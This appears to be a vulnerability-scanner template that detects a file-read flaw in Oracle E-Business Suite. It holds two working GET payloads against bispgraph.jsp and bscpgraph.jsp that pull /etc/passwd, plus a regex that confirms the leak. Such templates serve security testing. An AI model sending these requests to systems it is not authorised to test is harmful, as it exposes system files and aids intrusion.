id: oracle-ebs-bispgrapgh-file-read info: name: Oracle EBS Bispgraph File Access author: emenalf,tirtha_mandal,thomas_from_offensity severity: critical reference: - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf tags: oracle,lfi requests: - method: GET path: - "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/" - "{{BaseURL}}/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd" matchers: - type: regex regex: - "root:.*:0:0:" part: body